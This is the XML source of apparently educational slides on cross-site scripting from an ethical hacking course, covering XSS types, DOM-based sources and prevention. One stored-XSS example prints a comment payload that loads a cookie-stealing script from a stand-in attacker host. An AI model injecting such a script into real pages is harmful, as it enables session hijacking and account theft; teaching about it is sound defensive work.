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1" r:id="rId2"/>
    <p:sldId id="345" r:id="rId3"/>
    <p:sldId id="347" r:id="rId4"/>
    <p:sldId id="353" r:id="rId5"/>
    <p:sldId id="355" r:id="rId6"/>
    <p:sldId id="356" r:id="rId7"/>
    <p:sldId id="357" r:id="rId8"/>
    <p:sldId id="3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8D9223-805D-47B7-B99B-B962270A161B}" v="53" dt="2022-08-01T15:51:24.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808B7-8EC4-40DD-A0C6-2697B27C4116}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/11/2022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2FD-0700-4E3B-A543-76C05F61BE55}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2425683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3F4D-9676-4622-98B1-1684913451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D76CD7-1A87-4894-A823-84DDF67600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197AA-BFA7-481A-8D2F-239F4A21F6F4}"/>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DF91F58-6859-4352-8154-5509CA62A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2A76F1-E366-4A18-B1CD-CBE1FD4F972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97562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BBDF-05C8-48FE-8578-81653972A5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8B16-F19E-4AB3-B1BC-8480E35B91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9F1CF-11CF-444C-B573-36A5F87C0302}"/>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69812948-A7F2-428C-A580-7E00E564D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418B3-7C83-41C9-BBD8-B1E5A9F278FA}"/>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91311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EC272-3A7D-4C7B-B69B-92241326EC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DC49BC-4152-431F-8D79-60707C8FBD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8C61D6-1D0A-44E4-96BD-6FF92D66CB5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E47838D-582D-4470-9062-AD3F62B1BE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D8F6F-A241-4BFB-A527-511679AD74D4}"/>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014840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1092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571499" y="1137256"/>
            <a:ext cx="11209376"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571499" y="348662"/>
            <a:ext cx="11209376" cy="464000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3200" b="0">
                <a:solidFill>
                  <a:srgbClr val="A4123F"/>
                </a:solidFill>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click Here To Edit Title</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{140DA784-0993-4F43-BA98-733CB6486E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489" y="6369932"/>
            <a:ext cx="12218977" cy="521007"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5D41DD4-A5E8-4552-814D-0D80AF0F22E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26134" y="6490361"/>
            <a:ext cx="1781941" cy="314840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62663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BC2E-63BB-46DA-9476-282DF481F1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0CEBCE-5C74-4B23-8C31-6BA6951C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664AB-5438-4883-A8BE-4B10CB55139F}"/>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755E9443-B365-47F3-B649-B6521D819A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F2FBB-C49B-4622-9DA4-A493C29C57EE}"/>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6655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A25D-8B9D-48A4-AEBC-7CB6D99B5D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230708-F537-45EA-804E-DFECF5F01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79452B-D2CA-418C-BCBC-9672F40CC433}"/>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982EBD8D-F312-4D71-B496-C6B2835DB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5DE2C-430A-448A-9CB3-06D748CE87A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854032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27F11-30BB-4181-960C-39BA7BD3B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F9610A-0802-4DA4-8E84-FC2C23A64C1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70AFF6-69B3-42F8-808D-2801CFA272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AF242D-A5A7-4A43-8BAA-6B54857B4CB1}"/>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CEB09091-A15A-45DE-9F44-714D1230E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6BDDF-E201-4ED8-80F7-5BBF410B165F}"/>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08005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40E0-0B16-4F75-85C1-BBC1CC8416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1CC9B-B4DE-4D7A-9E68-1AF62219FB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1190A4-4D18-491E-8443-38263C8523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6A2D03-8074-4ED2-AFA3-87D5881DB6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42EE9C-8744-45E2-A9E4-3A366CF7E3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E356B0-54A0-4E7B-B80F-30C2AAFCBBA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8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4A1A6BF-9179-425F-93E5-F36D3E3641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1BFC4E-5967-40D5-8F97-B1D29B37C30D}"/>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1620953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9E6D9-1F59-421F-9BC1-149D3B8DE1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E04BE7-637D-48B3-91B4-DE503E5970D6}"/>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4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB0BD163-88FF-42F0-B2D0-EC0254B9F7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72FF8-D57B-4038-9D10-27723E78B38B}"/>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68636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80C74-A1BC-4AC5-89CB-9D93521F50DD}"/>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3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2233716-4570-4A97-846F-F05A61A660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BFEC-4552-4737-8279-B63D63046C39}"/>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3894625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7B-DD92-4B0A-A65F-716BB2CF49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4A5FEA-A7F0-457D-889E-1AF568954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63BC56-695A-4B4B-BD07-23E765585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72F86B-1A90-4850-BF52-D65E1FDBAADA}"/>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83845BCD-9B72-4721-84E1-456FA36CDC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5476E-E8A1-476F-A682-41854A310528}"/>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84156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D1C74-669C-469D-B638-F9B87518D0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232133-922D-42FB-8A6D-8DC1E99601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9E141-0C6D-4E80-8408-5F7439BAF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C3FCC-C2D6-4342-B146-CD92AB180A09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{387527F5-4B4F-4C3C-9D24-7A2D107F1F04}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/11/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B9B3C5D-FF99-4676-863D-366129840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631A67-2F7D-4AF9-A56E-12467A6FAD61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{65E84985-AC7C-41AE-8340-64F826C4F333}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2308699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FD276-02F3-48BB-8F3D-E42018871D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3733BD-A731-4E22-AB85-77785C7A8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98676-BF97-49F6-BAAE-E96B0570C9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527F5-4B4F-4C3C-9D24-7A2D107F1F04}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/11/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D26EEEA-76E3-46B8-95D7-257A3DA92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8FAAA0-9B4A-4E0E-A033-01F33DF2E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E84985-AC7C-41AE-8340-64F826C4F333}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3157256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hyperlink" Target="https://crashtest-security.com/cross-site-scripting-xss/" TargetMode="Externa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1540136" y="0"/>
            <a:ext cx="9176273"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 </a:t>
            </a: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85099" y="2667001"/>
            <a:ext cx="3443174" cy="11048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6453074" y="2927062"/>
            <a:ext cx="3874452" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="333399"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" charset="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Cross </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>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90673" y="2401045"/>
            <a:ext cx="0" cy="163681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807A921-4A34-4052-800D-82EA711F2427}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3741908" y="4477032"/>
            <a:ext cx="5418303" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>19CSE335 Ethical Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42782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Isosceles Triangle 2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0BE7923C-3E1D-317D-F837-5C5779AD0F3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="6361" t="22955" r="33829" b="28269"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="57352" y="662307"/>
            <a:ext cx="12077295" cy="5540189"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Isosceles Triangle 2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2463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E614F1C-2D93-42D0-B229-768199449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403089" y="0"/>
            <a:ext cx="4788912"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E3C3931-BA64-9CBD-A0C6-9B9494CBD849}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8174735" y="640081"/>
            <a:ext cx="3377183" cy="3708895"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Types of XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7373A4DA-C31D-240F-8CF3-2CD7675BE4BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="3003" r="1414" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="7534636" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="928795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927857-69B9-E2EC-B73D-0AD114DAC14D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="31882" r="72" b="7140"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1011338" y="1017240"/>
            <a:ext cx="9151235" cy="5005119"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93BB3D79-BF44-7B2C-73C2-20E155106FA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to Use Cross site scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="391581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4BAEFAD-2B5F-3BF0-CE3A-05829D31171F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2103663" y="1399869"/>
            <a:ext cx="8145012" cy="4382112"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC03DFA2-4AEC-BFC0-5F97-95A7194CBDAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored XSS	</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34872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4B669FA-B316-9323-A9C2-1362317E7CB4}"/>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While browsing an e-commerce website, a perpetrator discovers a vulnerability that allows HTML tags to be embedded in the site’s comments section. The embedded tags become a permanent feature of the page, causing the browser to parse them with the rest of the source code every time the page is opened.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The attacker adds the following comment: Great price for a great item! Read my review here &lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>=”http://hackersite.com/authstealer.js”&gt; &lt;/script&gt;.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>From this point on, every time the page is accessed, the HTML tag in the comment will activate a JavaScript file, which is hosted on another site, and has the ability to steal visitors’ session cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Using the session cookie, the attacker can compromise the visitor’s account, granting him easy access to his personal information and credit card data. Meanwhile, the visitor, who may never have even scrolled down to the comments section, is not aware that the attack took place.</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91A0208-CFA1-215D-B972-4273AB2667A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1957512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B0D5A-B4B3-CFA9-F998-32E8EA03BE99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DOM-based XSS is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="200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cross-site scripting vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> that enables attackers to inject a malicious payload into a web page by manipulating the client’s browser environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Since these attacks rely on the Document Object Model, they are orchestrated on the client-side after loading the page. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HTML source code and the response to the attack remain unchanged, so the malicious input is not included in the server response. Since the malicious payload is stored within the client’s browser environment, the attack cannot be detected using traditional traffic analysis tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>fundamentally, attackers perform DOM-based Cross-site scripting attacks on applications with an executable path for data to travel from a source to a sink. Sources are JavaScript properties that can act as the location of malicious input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ex:document.URL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document.referrer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location.search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location.has</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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431709D-DF4A-A2A2-8D4B-5DA99B0A1A3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>DOM-based XSS </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2735350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A877F4-ABA5-ADF1-BC55-0EB6557B5657}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Filter input on arrival. At the point where user input is received, filter as strictly as possible based on what is expected or valid input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Encode data on output. At the point where user-controllable data is output in HTTP responses, encode the output to prevent it from being interpreted as active content. Depending on the output context, this might require applying combinations of HTML, URL, JavaScript, and CSS encoding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Use appropriate response headers. To prevent XSS in HTTP responses that aren't intended to contain any HTML or JavaScript, you can use the Content-Type and X-Content-Type-Options headers to ensure that browsers interpret the responses in the way you intend.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Content Security Policy. As a last line of defense, you can use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36817B62-2AAC-17EF-83A5-45F9CE229CBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to prevent XSS attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
